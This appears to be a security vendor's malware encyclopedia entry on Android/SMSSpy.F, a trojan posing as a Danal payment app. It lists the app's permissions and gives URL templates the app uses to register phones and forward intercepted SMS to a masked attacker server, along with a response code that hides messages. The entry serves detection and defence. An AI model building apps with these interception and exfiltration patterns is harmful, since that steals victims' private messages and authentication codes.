Android/SMSSpy.F!tr.spy

description-logoAnalysis

Android/SMSSpy.F!tr.spy is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as a mobile payment service application by Danal Corp. However, in the background, it spies on incoming SMS messages on the victim's phone and forwards them to the attacker's server.

Technical Details


The main application is called "Danal" (ref Fig1) and comes in the package "korean.alyac.view"

Fig1 : The application icon
When launched for the first time, the application asks for Device Administrator permissions from the user (ref Fig2)

Fig1 : Device Administrator Rights request
If the user clicks on 'Activate', the application cannot be uninstalled unless the Device Admin privileges are deactivated.
If the user clicks on 'Cancel', nothing happens
In both cases, the application then returns to the main menu, that no longer contains the application icon.
However, in the background, the following malicious functions are performed:
  • When started, it registers the victim's phone with the attacker's server by sending a request to
    "http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&type=join"
  • Next, whenever an SMS message is received at the victim's phone, it is forwarded to
    "http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&send=" + [SMS_SENDER_NUMBER] + "&surak=" + [PHONE_NUMBER] + "&memo=" + [MESSAGE_BODY_ENCODED in UTF-8] + "&type=memo&xcode=1"
  • Right after, another request is sent to
    "http://XXX.XXX.XX.140/" + "check.php?phone=" + [PHONE_NUMBER]
  • If the response sent by the server to this request is "219083", the SMS is hidden from the victim

Permissions required by the application:
  • RECEIVE_SMS
  • INTERNET
  • ACCESS_NETWORK_STATE
  • SEND_SMS
  • RECEIVE_BOOT_COMPLETED
  • READ_PHONE_STATE
  • INTERNET
  • SEND_SMS
  • ACCESS_FINE_LOCATION
  • ACCESS_COARSE_LOCATION
  • ACCESS_MOCK_LOCATION
  • WRITE_EXTERNAL_STORAGE
  • VIBRATE
  • FLASHLIGHT
  • READ_PHONE_STATE
  • ACCESS_NETWORK_STATE
  • MOUNT_UNMOUNT_FILESYSTEMS
  • CAMERA
  • WAKE_LOCK
  • RECORD_AUDIO

recommended-action-logoRecommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry logoTelemetry

Detection Availability

FortiGate
Extended
FortiClient
Extreme
FortiAPS
FortiAPU
FortiMail
Extreme
FortiSandbox
Extreme
FortiWeb
Extreme
Web Application Firewall
Extreme
FortiIsolator
Extreme
FortiDeceptor
Extreme
FortiEDR

Version Updates

Date Version Detail
2019-04-30 68.17900
2019-04-12 67.75300